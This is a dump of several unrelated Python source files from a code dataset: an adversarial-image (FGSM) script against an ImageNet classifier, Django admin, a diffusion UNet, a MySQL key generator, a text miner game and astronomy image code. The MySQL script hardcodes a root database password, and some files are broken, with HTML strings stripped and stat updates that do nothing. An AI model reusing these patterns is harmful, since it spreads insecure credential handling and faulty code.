cal_IOU(rar_grad_cam, adv_grad_cam)\ngloss = g_loss(rar_grad_cam, adv_grad_cam)\n\nassign_op = tf.assign(x_adv, x)\n\n# 自动更新\nget_sign_gloss = sign_gloss(rar_grad_cam, adv_grad_cam)\ntrain_op = tf.train.GradientDescentOptimizer(1.2).minimize(get_sign_gloss, var_list=[x_adv])\n# 手动更新\ngrad_sgloss = tf.gradients(get_sign_gloss, x_adv)[0]\ng_assign = tf.assign(x_adv, x_adv - tf.sign(grad_sgloss) * step / 255)\n# project\nepsilon = 4 / 255\nbelow = x - epsilon\nabove = x + epsilon\nprojected = tf.clip_by_value(tf.clip_by_value(x_adv, below, above), 0, 1)\nwith tf.control_dependencies([projected]):\n project_step = tf.assign(x_adv, projected)\n\ncorrect = tf.equal(tf.argmax(rar_probs, 1), (tf.argmax(adv_probs, 1)))\n_corrects=tf.equal(tf.argmax(rar_probs, 1), y_hat)\nsess.graph.finalize()\n\nimport cv2\n\n\ndef get_hot_map(RGC, rar_img):\n RGC = np.reshape(RGC / np.max(RGC), [299, 299])\n RGC = np.expand_dims(RGC, 2)\n RGC = np.tile(RGC, [1, 1, 3])\n RGC = cv2.applyColorMap(np.uint8(255 * RGC), cv2.COLORMAP_JET)\n RGC = cv2.cvtColor(RGC, cv2.COLOR_BGR2RGB)\n alpha = 0.0072\n rar_img /= rar_img.max()\n rar = alpha * RGC + rar_img\n rar /= rar.max()\n return rar\n\n\n# Begin Run\nimport os\nlabels_file = '../dataset/imagenet_labels.txt'\n\nimgs_path = \"../dataset/img_val/\"\nattack_count = 0\ndefense_count = 0\ncount=0\nif os.path.exists(result_file):\n os.remove(result_file)\nwith open(labels_file, 'r', encoding='utf-8')as f:\n lines = f.readlines()\n for index, line in enumerate(lines):\n imgs = []\n labels = []\n label_letter = line.split(' ')\n ground_truths = []\n label_letter = label_letter[0]\n img_class = index\n dir_name = imgs_path + str(label_letter)\n for root, dirs, files in os.walk(dir_name):\n for file in files:\n img_path = dir_name + '/' + file\n label_path = '../dataset/val/' + str(file)[:-4] + 'xml'\n img=load(img_path)\n sess.run(assign_op, feed_dict={x: [img]})\n rar_img = img\n corrects=sess.run(_corrects, feed_dict={x: [img], x_rar: [rar_img], y_hat: img_class})\n if corrects[0]:\n for i in range(3):\n adv_map = sess.run(adv_grad_cam, feed_dict={y_hat: img_class})\n adv_img = np.reshape(sess.run(x_adv), [299, 299, 3])\n adv_map = get_hot_map(adv_map, adv_img)\n sess.run(train_op, feed_dict={x: [img], x_rar: [rar_img], y_hat: img_class})\n # sess.run(project_step, feed_dict={x: [rar_img]})\n result=sess.run(correct, feed_dict={x: [img], x_rar: [rar_img], y_hat: img_class})\n if result[0]:\n defense_count+=1\n else:\n attack_count+=1\n count+=1\n print(attack_count,defense_count,count)\n with open(result_file, 'a') as f_w:\n f_w.write(str(result[0])+\"\\n\")\n else:\n print('failed')\n with open(result_file, 'a') as f_w:\n f_w.write(str(attack_count)+str(defense_count)+str(count))\n","sub_path":"experiment/attack_method/train_FGSM.py","file_name":"train_FGSM.py","file_ext":"py","file_size_in_byte":8206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"640287733","text":"from django.contrib import admin\nfrom .models import ContactRequest, Project\nfrom tinymce.widgets import TinyMCE\nfrom django.db import models\n\n\nclass ProjectAdmin(admin.ModelAdmin):\n\n fieldsets = [\n (\"Name\", {\"fields\": [\"name\", \"longName\"]}),\n (\"Type\", {\"fields\": [\"project_type\"]}),\n (\"Description\", {\"fields\": [\"short_description\", \"short_description2\", \"long_description\"]}),\n (\"URL\", {\"fields\": [\"url\"]}),\n (\"Image\", {\"fields\": [\"project_image\"]})\n ]\n\n formfield_overrides = {\n models.TextField: {'widget': TinyMCE()},\n }\n\n\nadmin.site.register(ContactRequest)\nadmin.site.register(Project, ProjectAdmin)\n","sub_path":"main_pages/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"434777780","text":"#!/usr/bin/env python\n\nimport os\nimport sys\n\nif __name__ == '__main__':\n \n plotsuf = ['gif', 'jpg', 'png']\n\n scriptname=sys.argv[0]\n scriptpath=scriptname.split(\"/mkHTML.py\")[0]\n files = os.listdir(scriptpath)\n cwd = os.getcwd()\n\n ausgabe = '<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\\n\\\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\\n\\\n <head>\\n\\\n <style type=\"text/css\">\\n\\\n <!--\\n\\\n body {position: absolute; background: white; margin: 0; padding: 0;}\\n\\\n div#images {width: 130;}\\n\\\n div#images a p img {height: 0; width: 0; border-width: 0;}\\n\\\n div#images a:hover p img {position: fixed; top: 157px; left: 600px; height: 372px; width: 596px;}\\n\\\n -->\\n\\\n </style>\\n\\\n <title>Plots in Directory %s\\n\\\n \\n\\\n \\n\\\n Parent Directory\\n\\\n \\n\\\n
\\n\\\n \\n\\\n \\n' % cwd\n \n plots = []\n alreadyexists = 0\n \n for file in files:\n if (file.split('.')[-1]) not in plotsuf:\n continue\n else:\n for file2 in plots:\n if (file.split('.')[0] == file2.split('.')[0]):\n alreadyexists = 1\n break\n if (alreadyexists == 0):\n plots.append(file)\n alreadyexists = 0\n\n \n i = 0\n j = 0\n ausgabe2 = \"\"\n ausgabe1 = \"\"\n\n plotsuf2 = plotsuf\n plotsuf2.append('eps');\n plotsuf2.append('tiff');\n \n for plot in plots:\n ausgabe1 += ' \\n' % (plot,plot)\n ausgabe2 += '\\n'\n i += 1\n j += 1\n if (i % 2) == 0:\n ausgabe += ausgabe2\n ausgabe += '\\n '\n ausgabe += ausgabe1\n ausgabe += '\\n '\n ausgabe1 = \"\"\n ausgabe2 = \"\"\n if (j % 2) == 1:\n ausgabe += ausgabe2\n ausgabe += '\\n '\n ausgabe += ausgabe1\n ausgabe += '\\n '\n ausgabe1 = \"\"\n ausgabe2 = \"\"\n \n ausgabe += '
'\n for suffix in plotsuf2:\n if (plot.split('.')[0]+\".\"+suffix) in files:\n ausgabe2 += ' %s' % (plot.split('.')[0]+\".\"+suffix,suffix)\n ausgabe2 += '
\\n
\\n \\n'\n# ausgabe += \" \\n\"\n ausgabe +='\\n'\n \nplotsdir = open(scriptpath+'/overview.html', 'w+')\nplotsdir.write(ausgabe)\nplotsdir.close()\n\nplotsdir = open(scriptpath+'/empty.html', 'w+')\nplotsdir.write('\\n
 \\n \\n \\n No histogram selected \\n 
')\nplotsdir.close()\n\nindexausgabe = \"\"\nindexausgabe += '\\n'\nindexausgabe += ' \\n'\nindexausgabe += ' Validation plots\\n'\nindexausgabe += ' \\n'\nindexausgabe += ' \\n'\nindexausgabe += ' \\n'\nindexausgabe += ' \\n'\nindexausgabe += ' \\n'\nindexausgabe += ' \\n'\nindexausgabe += ' \\n'\nindexausgabe += ' Ihr Browser kann keine Frames!\\n'\nindexausgabe += ' \\n'\nindexausgabe += ' \\n'\nindexausgabe += '\\n'\n\nplotsdir = open(scriptpath+'/index.html', 'w+')\nplotsdir.write(indexausgabe)\nplotsdir.close()\n\nindexausgabe = \"\"\n\n\nanalysisausgabe = \"\"\nanalysisausgabe += '\\n'\nanalysisausgabe += ' \\n'\nanalysisausgabe += ' Process and analysis\\n'\nanalysisausgabe += ' \\n'\nanalysisausgabe += ' \\n'\nanalysisausgabe += '

Validation plots



\\n'\nanalysisausgabe += ' For these plots the following setup was used:
\\n'\n#analysisausgabe += ' configuration of the process (analysis kind, steering file, etc.)
\\n'\n\n\n\n\nanalysisausgabe += ' \\n'\nanalysisausgabe += '\\n'\n\nplotsdir = open(scriptpath+'/analysis.html', 'w+')\nplotsdir.write(analysisausgabe)\nplotsdir.close()\n\nanalysisausgabe = \"\"\n","sub_path":"LeptonJets/mkHTML.py","file_name":"mkHTML.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143093020","text":"import math\n\nimport torch\nfrom torch import nn\n\n\n@torch.jit.script\ndef mish(inp):\n return inp.mul(torch.nn.functional.softplus(inp).tanh())\n\n\n@torch.no_grad()\ndef variance_scaling_init_(tensor, scale=1, mode=\"fan_avg\", distribution=\"uniform\"):\n fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(tensor)\n\n if mode == \"fan_in\":\n scale /= fan_in\n\n elif mode == \"fan_out\":\n scale /= fan_out\n\n else:\n scale /= (fan_in + fan_out) / 2\n\n if distribution == \"normal\":\n std = math.sqrt(scale)\n\n return tensor.normal_(0, std)\n\n else:\n bound = math.sqrt(3 * scale)\n\n return tensor.uniform_(-bound, bound)\n\n\ndef conv2d(in_channel, out_channel, kernel_size, stride=1, padding=0, bias=True, scale=1., mode=\"fan_avg\",\n transpose=False):\n conv_class = getattr(nn, f'Conv{\"Transpose\" if transpose else \"\"}2d')\n conv = conv_class(in_channel, out_channel, kernel_size, stride=stride, padding=padding, bias=bias)\n\n variance_scaling_init_(conv.weight, scale, mode=mode)\n\n if bias:\n nn.init.zeros_(conv.bias)\n\n return conv\n\n\ndef linear(in_channel, out_channel, scale=1, mode=\"fan_avg\"):\n lin = nn.Linear(in_channel, out_channel)\n\n variance_scaling_init_(lin.weight, scale, mode=mode)\n nn.init.zeros_(lin.bias)\n\n return lin\n\n\nclass Mish(torch.jit.ScriptModule):\n def __init__(self):\n super().__init__()\n\n def forward(self, input):\n return mish(input)\n\n\ndef upsample(channel):\n return conv2d(channel, channel, 4, stride=2, padding=1, transpose=True)\n\n\ndef downsample(channel):\n return conv2d(channel, channel, 3, stride=2, padding=1)\n\n\n@torch.jit.script\ndef nothing(inp):\n return inp\n\n\nclass ResBlock(torch.jit.ScriptModule):\n def __init__(self, in_channel, out_channel, time_dim, dropout):\n super().__init__()\n\n self.norm1 = nn.InstanceNorm2d( in_channel)\n self.conv1 = conv2d(in_channel, out_channel, 3, padding=1)\n\n self.time = linear(time_dim, out_channel)\n\n self.norm2 = nn.InstanceNorm2d( out_channel)\n self.dropout = nn.Dropout(dropout)\n self.conv2 = conv2d(out_channel, out_channel, 3, padding=1, scale=1e-10)\n self.skip = conv2d(in_channel, out_channel, 1) if in_channel != out_channel else nothing\n\n def forward(self, input, time):\n batch = input.shape[0]\n\n out = self.conv1(mish(self.norm1(input)))\n\n out = out + self.time(mish(time)).view(batch, -1, 1, 1)\n\n out = self.conv2(mish(self.norm2(out)))\n\n return out + self.skip(input)\n\n\nclass SelfAttention(torch.jit.ScriptModule):\n def __init__(self, in_channel, heads=1):\n super().__init__()\n\n self.norm = nn.InstanceNorm2d( in_channel)\n self.weight = torch.nn.Parameter(torch.randn(2 * (in_channel * heads + heads) + in_channel, in_channel))\n self.gate = torch.nn.Parameter(torch.zeros(1))\n self.heads = heads\n self.in_channel = in_channel\n\n def forward(self, inp):\n batch, channel, height, width = inp.shape\n\n out = self.weight.unsqueeze(0).expand(batch, -1, -1).bmm(self.norm(inp).view(batch, channel, -1))\n lin = out[:, :self.in_channel]\n key = out[:, self.in_channel:self.in_channel * (1 + self.heads)].view(batch, channel, self.heads,\n height * width)\n query = out[:, self.in_channel * (1 + self.heads):\n self.in_channel + 2 * self.in_channel * self.heads].view(batch, channel, self.heads,\n height * width)\n key_choice = out[:, self.in_channel + 2 * self.in_channel * self.heads:\n self.in_channel + 2 * self.in_channel * self.heads + self.heads].softmax(1)\n query_choice = out[:, self.in_channel + 2 * self.in_channel * self.heads + self.heads:].softmax(1)\n\n key = key.mul(key_choice.unsqueeze(1)).sum(2)\n query = query.mul(query_choice.unsqueeze(1)).sum(2)\n\n key = key.softmax(2).bmm(query.transpose(1, 2))\n lin = key.bmm(lin)\n lin = lin.view(batch, channel, height, width)\n out = lin * self.gate + inp\n return out\n\n\nclass TimeEmbedding(torch.jit.ScriptModule):\n def __init__(self, dim):\n super().__init__()\n\n self.dim = dim\n\n inv_freq = torch.exp(torch.arange(0, dim, 2, dtype=torch.float32) * (-math.log(10000) / dim))\n\n self.register_buffer(\"inv_freq\", inv_freq)\n\n def forward(self, input):\n sinusoid_in = torch.ger(input.view(-1).float(), self.inv_freq)\n pos_emb = torch.cat([sinusoid_in.sin(), sinusoid_in.cos()], dim=-1)\n pos_emb = pos_emb.view(input.size(0), self.dim)\n\n return pos_emb\n\n\nclass ResBlockWithAttention(torch.jit.ScriptModule):\n def __init__(self, in_channel, out_channel, time_dim, dropout, use_attention=False):\n super().__init__()\n\n self.resblocks = ResBlock(in_channel, out_channel, time_dim, dropout)\n\n self.attention = SelfAttention(out_channel) if use_attention else nothing\n\n def forward(self, input, time):\n out = self.resblocks(input, time)\n out = self.attention(out)\n return out\n\n\ndef spatial_fold(input, fold):\n if fold == 1:\n return input\n\n batch, channel, height, width = input.shape\n h_fold = height // fold\n w_fold = width // fold\n\n return input.view(batch, channel, h_fold, fold, w_fold,\n fold).permute(0, 1, 3, 5, 2, 4).reshape(batch, -1, h_fold, w_fold)\n\n\ndef spatial_unfold(input, unfold):\n if unfold == 1:\n return input\n\n batch, channel, height, width = input.shape\n h_unfold = height * unfold\n w_unfold = width * unfold\n\n return input.view(batch, -1, unfold, unfold, height,\n width).permute(0, 1, 4, 2, 5, 3).reshape(batch, -1, h_unfold, w_unfold)\n\n\nclass UNet(torch.jit.ScriptModule):\n def __init__(\n self,\n in_channel,\n channel,\n channel_multiplier,\n n_res_blocks,\n attn_strides,\n dropout=0,\n fold=1,\n ):\n super().__init__()\n\n self.fold = fold\n\n time_dim = channel * 4\n\n n_block = len(channel_multiplier)\n\n self.time = nn.Sequential(\n TimeEmbedding(channel),\n linear(channel, time_dim),\n Mish(),\n linear(time_dim, time_dim),\n )\n\n down_layers = [conv2d(in_channel * (fold ** 2), channel, 3, padding=1)]\n feat_channels = [channel]\n in_channel = channel\n for i in range(n_block):\n for _ in range(n_res_blocks):\n channel_mult = channel * channel_multiplier[i]\n\n down_layers.append(\n ResBlockWithAttention(\n in_channel,\n channel_mult,\n time_dim,\n dropout,\n use_attention=2 ** i in attn_strides,\n )\n )\n\n feat_channels.append(channel_mult)\n in_channel = channel_mult\n\n if i != n_block - 1:\n down_layers.append(downsample(in_channel))\n feat_channels.append(in_channel)\n\n self.down = nn.ModuleList(down_layers)\n\n self.mid = nn.ModuleList(\n [\n ResBlockWithAttention(\n in_channel,\n in_channel,\n time_dim,\n dropout=dropout,\n use_attention=True,\n ),\n ResBlockWithAttention(\n in_channel, in_channel, time_dim, dropout=dropout\n ),\n ]\n )\n\n up_layers = []\n for i in reversed(range(n_block)):\n for _ in range(n_res_blocks + 1):\n channel_mult = channel * channel_multiplier[i]\n\n up_layers.append(\n ResBlockWithAttention(\n in_channel + feat_channels.pop(),\n channel_mult,\n time_dim,\n dropout=dropout,\n use_attention=2 ** i in attn_strides,\n )\n )\n\n in_channel = channel_mult\n\n if i != 0:\n up_layers.append(upsample(in_channel))\n\n self.up = nn.ModuleList(up_layers)\n\n self.out_norm = nn.GroupNorm(32, in_channel)\n self.out_conv = conv2d(in_channel, 3 * (fold ** 2), 3, padding=1, scale=1e-10)\n\n def forward(self, input, time):\n time_embed = self.time(time)\n\n feats = []\n\n out = spatial_fold(input, self.fold)\n for layer in self.down:\n if isinstance(layer, ResBlockWithAttention):\n out = layer(out, time_embed)\n\n else:\n out = layer(out)\n\n feats.append(out)\n\n for layer in self.mid:\n out = layer(out, time_embed)\n\n for layer in self.up:\n if isinstance(layer, ResBlockWithAttention):\n out = layer(torch.cat((out, feats.pop()), 1), time_embed)\n\n else:\n out = layer(out)\n\n out = self.out_conv(mish(self.out_norm(out)))\n out = spatial_unfold(out, self.fold)\n\n return out\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"367133074","text":"import sys\nimport argparse\nimport random\nimport time\nimport numpy as np\n\nimport server.compute.diffexp_cxg as diffexp_cxg\nimport server.compute.diffexp_generic as diffexp_generic\n\nfrom server.common.app_config import AppConfig\nfrom server.data_common.matrix_loader import MatrixDataLoader\nfrom server.data_cxg.cxg_adaptor import CxgAdaptor\n\n\ndef main():\n parser = argparse.ArgumentParser(\"A command to test diffexp\")\n parser.add_argument(\"dataset\", help=\"name of a dataset to load\")\n parser.add_argument(\"-na\", \"--numA\", type=int, required=True, help=\"number of rows in group A\")\n parser.add_argument(\"-nb\", \"--numB\", type=int, required=True, help=\"number of rows in group B\")\n parser.add_argument(\"-t\", \"--trials\", default=1, type=int, help=\"number of trials\")\n parser.add_argument(\n \"-a\", \"--alg\", choices=(\"default\", \"generic\", \"cxg\"), default=\"default\", help=\"algorithm to use\"\n )\n parser.add_argument(\"-s\", \"--show\", default=False, action=\"store_true\", help=\"show the results\")\n parser.add_argument(\n \"-n\", \"--new-selection\", default=False, action=\"store_true\", help=\"change the selection between each trial\"\n )\n parser.add_argument(\"--seed\", default=1, type=int, help=\"set the random seed\")\n\n args = parser.parse_args()\n\n app_config = AppConfig()\n app_config.single_dataset__datapath = args.dataset\n app_config.server__verbose = True\n app_config.complete_config()\n\n loader = MatrixDataLoader(args.dataset)\n adaptor = loader.open(app_config)\n\n if args.show:\n if isinstance(adaptor, CxgAdaptor):\n adaptor.open_array(\"X\").schema.dump()\n\n numA = args.numA\n numB = args.numB\n rows = adaptor.get_shape()[0]\n\n random.seed(args.seed)\n\n if not args.new_selection:\n samples = random.sample(range(rows), numA + numB)\n filterA = samples[:numA]\n filterB = samples[numA:]\n\n for i in range(args.trials):\n if args.new_selection:\n samples = random.sample(range(rows), numA + numB)\n filterA = samples[:numA]\n filterB = samples[numA:]\n\n maskA = np.zeros(rows, dtype=bool)\n maskA[filterA] = True\n maskB = np.zeros(rows, dtype=bool)\n maskB[filterB] = True\n\n t1 = time.time()\n if args.alg == \"default\":\n results = adaptor.compute_diffexp_ttest(maskA, maskB)\n elif args.alg == \"generic\":\n results = diffexp_generic.diffexp_ttest(adaptor, maskA, maskB)\n elif args.alg == \"cxg\":\n if not isinstance(adaptor, CxgAdaptor):\n print(\"cxg only works with CxgAdaptor\")\n sys.exit(1)\n results = diffexp_cxg.diffexp_ttest(adaptor, maskA, maskB)\n\n t2 = time.time()\n print(\"TIME=\", t2 - t1)\n\n if args.show:\n for res in results:\n print(res)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"server/test/run_diffexp.py","file_name":"run_diffexp.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"407930350","text":"import random\r\nimport string\r\nimport pymysql\r\nfrom warnings import filterwarnings\r\nfilterwarnings(\"error\",category=pymysql.Warning) # 指定过滤告警的类别为 pymysql.Warning类,\r\ndb=pymysql.connect('localhost','root','Mr.jingcheng','python_db')\r\ncur=db.cursor()\r\nsql = \"\"\"CREATE TABLE IF NOT EXISTS ALL_KEYS (\r\n V_KEY CHAR(35) PRIMARY KEY,\r\n AVAIL CHAR(1) \r\n )\"\"\"\r\n\r\n\r\n\r\ndef insert_to_mysql(key):\r\n sql = \"INSERT INTO ALL_KEYS(V_KEY,AVAIL) VALUES ('%s', '1')\"%(key)\r\n try:\r\n cur.execute(sql)\r\n db.commit()\r\n except:\r\n print('无法插入')\r\n db.rollback()\r\n\r\ndef genernate_key(number=5, lenth=8, part=4):\r\n result = []\r\n char_set = string.ascii_letters + string.digits\r\n for i in range(0, number):\r\n key = ''\r\n for j in range(0, part):\r\n for k in range(0, lenth):\r\n key = key + random.choice(char_set)\r\n key = key + '-'\r\n key = key[0:-1]\r\n if key not in result:\r\n result.append(key)\r\n print(\"%s %s\" % (str(i + 1), key))\r\n else:\r\n i -= 1\r\n return result\r\n\r\ndef key_read_avail():\r\n sql = \"SELECT * FROM ALL_KEYS \\\r\n WHERE AVAIL <> 0\"\r\n cur.execute(sql)\r\n rows =cur.fetchall()\r\n result=[]\r\n for each in rows:\r\n result.append(each[0])\r\n return result\r\n\r\ndef key_read_all():\r\n sql = \"SELECT * FROM ALL_KEYS\"\r\n result = []\r\n try:\r\n cur.execute(sql)\r\n rows =cur.fetchall()\r\n for each in rows:\r\n result.append(each[0])\r\n except:\r\n print('错误:无法获取数据')\r\n return result\r\n\r\ndef verify_key(key):\r\n sql = \"SELECT * FROM ALL_KEYS WHERE V_KEY='%s' AND AVAIL='1'\"%key\r\n cur.execute(sql)\r\n res=cur.fetchone()\r\n if res is not None:\r\n try:\r\n cur.execute(\"UPDATE ALL_KEYS SET AVAIL = '0' WHERE V_KEY = '%s'\" % (key))\r\n db.commit()\r\n return True\r\n except:\r\n print('错误!无法更新')\r\n db.rollback()\r\n else:\r\n return False\r\n\r\n\r\n\r\n# result=genernate_key(200)\r\n# for each in result:\r\n# insert_to_mysql(each)\r\nprint(verify_key('xGJDKbZw-0hfWuCbj-WyH6tAir-LawiPxvm'))\r\n# result = key_read()\r\n# key = 'yf56g7h8-cot4imw3-9e01gml1-0gy7xkdi'\r\n# print(verify_key(result, key))\r\ndb.close()","sub_path":"0003MySQL.py","file_name":"0003MySQL.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339793618","text":"import time\nimport random\nimport states\nimport items\n\n\nclass BaseGameEntity:\n id = 0\n\n def __init__(self):\n self.id = BaseGameEntity.id\n BaseGameEntity.id += 1\n\nclass Plant(BaseGameEntity):\n def __init__(self, location, lifespan):\n super(Plant, self).__init__()\n self.location = location\n self.lifespan = lifespan\n\n def update(self):\n self.lifespan -= 1\n if self.lifespan == 0:\n self.die()\n\n def die(self):\n if plant1 in game_objects:\n game_objects.remove(plant1)\n if plant2 in game_objects:\n game_objects.remove(plant2)\n if plant3 in game_objects:\n game_objects.remove(plant3)\n if plant4 in game_objects:\n game_objects.remove(plant4)\n\n\nclass PoisonPlant(Plant):\n def __init__(self, location, lifespan, name, condition):\n super(PoisonPlant, self).__init__(location, lifespan)\n self.name = name\n self.condition = condition\n\n def debuff(condition):\n if plant1 in game_objects:\n Miner.thirst + 4\n Miner.fatigue + 4\n\nclass EnergyPlant(Plant):\n def __init__(self, location, lifespan, name, condition):\n super(EnergyPlant, self).__init__(location, lifespan)\n self.name = name\n self.condition = condition\n\n def buff(condition):\n if plant2 in game_objects:\n Miner.fatigue - 3\n\nclass LiquidPlant(Plant):\n def __init__(self, location, lifespan, name, condition):\n super(LiquidPlant, self).__init__(location, lifespan)\n self.name = name\n self.condition = condition\n\n def buff(condition):\n if plant4 in game_objects:\n Miner.thirst - 3\n\nclass UltraPlant(Plant):\n def __init__(self, location, lifespan, name, condition):\n super(UltraPlant, self).__init__(location, lifespan)\n self.name = name\n self.condition = condition\n\n def buff(condition):\n if plant3 in game_objects:\n Miner.thirst - 5\n Miner.fatigue - 5\n\n\nclass Miner(BaseGameEntity):\n \"\"\"The Miner game object\n\n \"\"\"\n\n def __init__(self, name, current_state, location, gold_carried, gold_bank, thirst, fatigue, build, pickax):\n super(Miner, self).__init__()\n self.name = name\n self.current_state = current_state\n self.location = location\n self.gold_carried = gold_carried\n self.gold_bank = gold_bank\n self.thirst = thirst\n self.fatigue = fatigue\n self.max_nuggets = 5\n self.status = 'free'\n self.counter_jail = 0\n self.max_nuggets = 7\n self.pickax = pickax\n if build == \"lanky\":\n self.health = 30\n self.strength = 3 + self.pickax.strength\n if build == \"normal\":\n self.health = 50\n self.strength = 5 + self.pickax.strength\n if build == \"bulky\":\n self.health = 70\n self.strength = 7 + self.pickax.strength\n\n def update(self):\n self.thirst += 1\n self.current_state.execute(self)\n\n def change_state(self, new_state):\n self.current_state.exit(self)\n self.current_state = new_state\n self.current_state.enter(self)\n\n def pockets_full(self):\n if self.gold_carried > self.max_nuggets:\n return True\n else:\n return False\n\n def thirsty(self):\n if self.thirst > 10:\n return True\n else:\n return False\n\n def is_tired(self):\n if self.fatigue > 10:\n return True\n else:\n return False\n\nclass Wife(BaseGameEntity):\n\n def __init__(self, name, wife_state, location, fatigue, dishes_washed, shirts_ironed, cups_made):\n super(Wife, self).__init__()\n self.name=name\n self.wife_state=wife_state\n self.location=location\n self.fatigue=fatigue\n self.dishes_washed=dishes_washed\n self.shirts_ironed=shirts_ironed\n self.cups_made = cups_made\n self.max_cups = 2\n\n def update(self):\n self.fatigue+=1\n self.wife_state.execute(self)\n\n def wife_change_state(self, new_state):\n self.wife_state.exit(self)\n self.wife_state=new_state\n self.wife_state.enter(self)\n\n def tired(self):\n if self.fatigue > 4:\n return True\n else:\n return False\n\n def coffee_made(self):\n if self.cups_made == self.max_cups:\n return True\n else:\n return False\n\nif __name__ == '__main__':\n real_miner = Miner('Bob',\n states.enter_mine_and_dig_for_nugget,\n 'home',\n 0,\n 0,\n 0,\n 0,\n \"bulky\",\n items.small_pickax)\n other_miner = Miner('Sam',\n states.enter_mine_and_dig_for_nugget,\n 'home',\n 1,\n 10,\n 0,\n 0,\n \"lanky\",\n items.small_pickax)\n\n miner_wife = Wife('Deloris',\n states.wake_up_and_make_coffee,\n 'home',\n 0,\n 0,\n 0,\n 0)\n\n plant1 = PoisonPlant('mine', 30, 'Poison Mushroom', 'Tired and Thirsty')\n plant2 = EnergyPlant('mine', 30, 'Super Mushroom', 'Energetic')\n plant3 = UltraPlant('mine', 30, 'Star Fruit', 'DANKNESS')\n plant4 = LiquidPlant('mine', 30, 'Snowbell Flower', 'Soothing')\n game_objects = [real_miner, other_miner, miner_wife]\n counter = 0\n plant_chance = [0, 1, 2, 3, 4, 5]\n while counter < 50:\n print(\"Game tick {}\".format(counter))\n for obj in game_objects:\n obj.update()\n time.sleep(0.5)\n counter += 1\n if random.choice(plant_chance) == 5 and counter % 5 == 0:\n game_objects.append(plant1)\n print(\"This looks safe to eat! Nope, wait, nevermind.\".format(real_miner.name))\n if random.choice(plant_chance) == 1 or 4 and counter % 3 == 0:\n game_objects.append(plant2)\n print(\"I can hear colors now!\".format(real_miner.name))\n if random.choice(plant_chance) == 2 and counter % 6 == 0:\n game_objects.append(plant3)\n print(\"The fruit of the gods!\".format(real_miner.name))\n if random.choice(plant_chance) == 0 or 3 and counter % 3 == 0:\n game_objects.append(plant4)\n print(\"How purtty!\".format(real_miner.name))\n","sub_path":"west_world.py","file_name":"west_world.py","file_ext":"py","file_size_in_byte":6652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"176013696","text":"\nimport galsim\n\ndef BuildImages(nimages, config, logger=None, image_num=0, obj_num=0, nproc=1,\n make_psf_image=False, make_weight_image=False, make_badpix_image=False):\n \"\"\"\n Build a number of postage stamp images as specified by the config dict.\n\n @param nimages How many images to build.\n @param config A configuration dict.\n @param logger If given, a logger object to log progress.\n @param image_num If given, the current image_num (default = 0)\n @param obj_num If given, the current obj_num (default = 0)\n @param nproc How many processes to use.\n @param make_psf_image Whether to make psf_image.\n @param make_weight_image Whether to make weight_image.\n @param make_badpix_image Whether to make badpix_image.\n\n @return (images, psf_images, weight_images, badpix_images) (All in tuple are lists)\n \"\"\"\n import time\n def worker(input, output):\n for (kwargs, config, image_num, obj_num, nim, info) in iter(input.get, 'STOP'):\n results = []\n # Make new copies of config and kwargs so we can update them without\n # clobbering the versions for other tasks on the queue.\n import copy\n kwargs1 = copy.copy(kwargs)\n config1 = copy.deepcopy(config)\n for i in range(nim):\n t1 = time.time()\n kwargs1['config'] = config1\n kwargs1['image_num'] = image_num + i\n kwargs1['obj_num'] = obj_num\n im = BuildImage(**kwargs1)\n obj_num += galsim.config.GetNObjForImage(config, image_num+i)\n t2 = time.time()\n results.append( [im[0], im[1], im[2], im[3], t2-t1 ] )\n output.put( (results, info, current_process().name) )\n \n # The kwargs to pass to BuildImage\n kwargs = {\n 'make_psf_image' : make_psf_image,\n 'make_weight_image' : make_weight_image,\n 'make_badpix_image' : make_badpix_image\n }\n # Apparently the logger isn't picklable, so can't send that as an arg.\n\n if nproc > nimages:\n if logger:\n logger.warn(\n \"Trying to use more processes than images: output.nproc=%d, \"%nproc +\n \"nimages=%d. Reducing nproc to %d.\"%(nimages,nimages))\n nproc = nimages\n\n if nproc <= 0:\n # Try to figure out a good number of processes to use\n try:\n from multiprocessing import cpu_count\n ncpu = cpu_count()\n if ncpu > nimages:\n nproc = nimages\n else:\n nproc = ncpu\n if logger:\n logger.info(\"ncpu = %d. Using %d processes\",ncpu,nproc)\n except:\n raise AttributeError(\n \"config.image.nproc <= 0, but unable to determine number of cpus.\")\n \n if nproc > 1:\n from multiprocessing import Process, Queue, current_process\n\n # Initialize the images list to have the correct size.\n # This is important here, since we'll be getting back images in a random order,\n # and we need them to go in the right places (in order to have deterministic\n # output files). So we initialize the list to be the right size.\n images = [ None for i in range(nimages) ]\n psf_images = [ None for i in range(nimages) ]\n weight_images = [ None for i in range(nimages) ]\n badpix_images = [ None for i in range(nimages) ]\n\n # Number of images to do in each task:\n # At most nimages / nproc.\n # At least 1 normally, but number in Ring if doing a Ring test\n # Shoot for gemoetric mean of these two.\n max_nim = nimages / nproc\n min_nim = 1\n #print 'gal' in config\n if ( ('image' not in config or 'type' not in config['image'] or \n config['image']['type'] == 'Single') and\n 'gal' in config and isinstance(config['gal'],dict) and 'type' in config['gal'] and\n config['gal']['type'] == 'Ring' and 'num' in config['gal'] ):\n min_nim = galsim.config.ParseValue(config['gal'], 'num', config, int)[0]\n #print 'Found ring: num = ',min_nim\n if max_nim < min_nim: \n nim_per_task = min_nim\n else:\n import math\n # This formula keeps nim a multiple of min_nim, so Rings are intact.\n 